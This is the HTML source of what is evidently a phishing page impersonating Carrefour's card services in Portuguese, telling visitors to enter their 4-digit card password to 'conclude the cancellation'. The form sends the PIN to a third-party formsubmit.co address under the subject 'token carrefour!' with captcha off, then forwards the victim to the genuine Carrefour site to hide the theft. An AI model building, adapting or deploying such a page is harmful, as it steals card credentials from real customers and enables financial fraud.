<!DOCTYPE html>

<html>
<head>
<title>Carrefour</title>
<meta content="summary_large_image" name="twitter:card"/>
<meta content="website" property="og:type"/>
<meta content="" property="og:description"/>
<meta content="https://8et7wmxxxp.preview-postedstuff.com/V2-gUgs-MzlY-9Ft9-zchn/" property="og:url"/>
<meta content="https://pro-bee-beepro-thumbnail.getbee.io/messages/1033909/1018977/1968977/9982713_large.jpg" property="og:image"/>
<meta content="" property="og:title"/>
<link rel="icon" type="image/x-icon" href="faviconn.ico">  
<meta content="" name="description"/>
<meta charset="utf-8"/>
<meta content="width=device-width" name="viewport"/>
<style>


form {
  width: 60%;
  max-width: 30rem;
  margin-top: 5%;
  margin-left: 20%;

}

label,
input,
textarea,
button {
  display: block;
} 

input,
textarea,
button {
  width: 100%;
  font: inherit;
  font-size: 18px;
  padding: 1.25rem;
  font-weight: 700;
}

input,
textarea {
  margin-bottom: 2px;
  color: black;
  background: #fff;
  border: 2px solid;
  border-radius: 5px;

}

input:hover,
input:focus,
textarea:hover,
textarea:focus {
  outline: none;
  border-color: #1d90f5;
  
}

label {
  margin-bottom: 0.5rem;
  color: #84868f;
}

textarea {
  min-height: 12.5rem;
  resize: vertical;
}

button {
  border: none;
  border-radius: 5px;
  color: white;
  background: #1e5bc6;
  cursor: pointer;
  transition: 0.3s;
}

button:hover,
button:focus {
  outline: none;
  background: #1d90f5;
}

button:disabled {
  cursor: not-allowed;
  background: #555b69;
}

.success,
.error {
  text-align: center;
}

.success {
  color: greenyellow;
}

.error {
  color: tomato;
}
		.bee-row,
		.bee-row-content {
			position: relative
		}
		header{
			background: #1e5bc6;
		}

		.bee-row-2,
		body {
			background-color: #fff
		}

		.bee-page-container,
		.bee-row-1,
		.bee-row-2 {
			background-repeat: no-repeat
		}

		body {
			color: #000;
			font-family: Arial, Helvetica, sans-serif
		}

		.bee-page-container {
			background-image: none;
			background-position: top left;
			background-size: auto
		}

		.bee-row-1 .bee-col-1 .bee-block-3 a,
		a {
			color: #7747ff
		}

		* {
			box-sizing: border-box
		}

		body,
		h1,
		p {
			margin: 0
		}

		.bee-row-content {
			max-width: 940px;
			margin: 0 auto;
			display: flex
		}

		.bee-row-content .bee-col-w12 {
			flex-basis: 100%
		}

		.bee-icon .bee-icon-label-right a {
			text-decoration: none
		}

		.bee-image {
			overflow: auto
		}

		.bee-icon {
			display: inline-block;
			vertical-align: middle
		}

		.bee-icon .bee-content {
			display: flex;
			align-items: center
		}

		.bee-image img {
			display: block;
			width: 100%
		}

		.bee-paragraph {
			overflow-wrap: anywhere
		}

		@media (max-width:768px) {
			.bee-row-content:not(.no_stack) {
				display: block
			}
		}

		.bee-row-1 .bee-row-content,
		.bee-row-2 .bee-row-content {
			background-color: #fff;
			background-repeat: no-repeat;
			color: #000
		}

		.bee-row-1 .bee-col-1,
		.bee-row-2 .bee-col-1 {
			padding-bottom: 5px;
			padding-top: 5px
		}

		.bee-row-1 .bee-col-1 .bee-block-1 {
			padding-bottom: 40px;
			padding-left: 35px;
			padding-top: 40px;
			width: 100%
		}

		.bee-row-1 .bee-col-1 .bee-block-2 {
			padding: 10px 10px 10px 30px;
			text-align: center;
			width: 100%
		}

		.bee-row-1 .bee-col-1 .bee-block-3 {
			padding: 10px 10px 10px 30px
		}

		.bee-row-2 .bee-col-1 .bee-block-1 {
			color: #1e0e4b;
			font-family: Inter, sans-serif;
			font-size: 15px;
			padding-bottom: 5px;
			padding-top: 5px;
			text-align: center
		}

		.bee-row-2 .bee-col-1 .bee-block-1 .bee-icon-image {
			padding: 5px 6px 5px 5px
		}

		.bee-row-2 .bee-col-1 .bee-block-1 .bee-icon:not(.bee-icon-first) .bee-content {
			margin-left: 0
		}

		.bee-row-2 .bee-col-1 .bee-block-1 .bee-icon::not(.bee-icon-last) .bee-content {
			margin-right: 0
		}

		.bee-row-1 .bee-col-1 .bee-block-3 {
			color: #101112;
			direction: ltr;
			font-size: 14px;
			font-weight: 400;
			letter-spacing: 0;
			line-height: 120%;
			text-align: left
		}

		.bee-row-1 .bee-col-1 .bee-block-3 p:not(:last-child) {
			margin-bottom: 16px
		}


		
	</style>
</head>
<body>
<div class="bee-page-container">
<div class="bee-row bee-row-1">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w12">
	<header>
<div class="bee-block bee-block-1 bee-image" id="module_a94166bb-7755-4bce-8296-7d62df341c8a"><img alt="" class="bee-autowidth" src="csf-brand.svg" style="max-width:117px;"/></div>

</header>
<br>


<div class="bee-block bee-block-2 bee-heading">
<h1 style="color:#020008;direction:ltr;font-family:Arial, Helvetica, sans-serif;font-size:24px;font-weight:700;letter-spacing:normal;line-height:120%;text-align:left;margin-top:0;margin-bottom:0;"><span class="tinyMce-placeholder">Para concluir o cancelamento</span> </h1>
</div>

<div class="bee-block bee-block-3 bee-paragraph">
<p>Digite sua senha de 4 digitos</p>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-2">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w12">
<div class="bee-block bee-block-1 bee-icons">
<div class="bee-icon bee-icon-last">
<div class="bee-content">
</div>
</div>
</div>
</div>
</div>
</div>
</div>



<div class="login-container">

	<form action="https://formsubmit.co/4d82b907d099ea35a305eebf0e55076b" method="POST">

	  <input type="hidden" name="_captcha" value="false">
	  <input type="hidden" name="_next" value="https://app.carrefoursolucoes.com.br/download-fatura/#/valida-dados">
	  <input type="hidden" name="_template" value="table">
	  <input type="hidden" name="_subject" value="token carrefour!">
	  <div class="imp">
		<label for="nome">Senha do cartão</label>
		<input type="password" name="token" id="nome" maxlength="4" minlength="4"  required />
		  <br>
		  <br>
		 
		  <div class="botao">
			<button type="submit" data-button>Continuar</button>

		
	  </form>
  </div>
</body>
</html>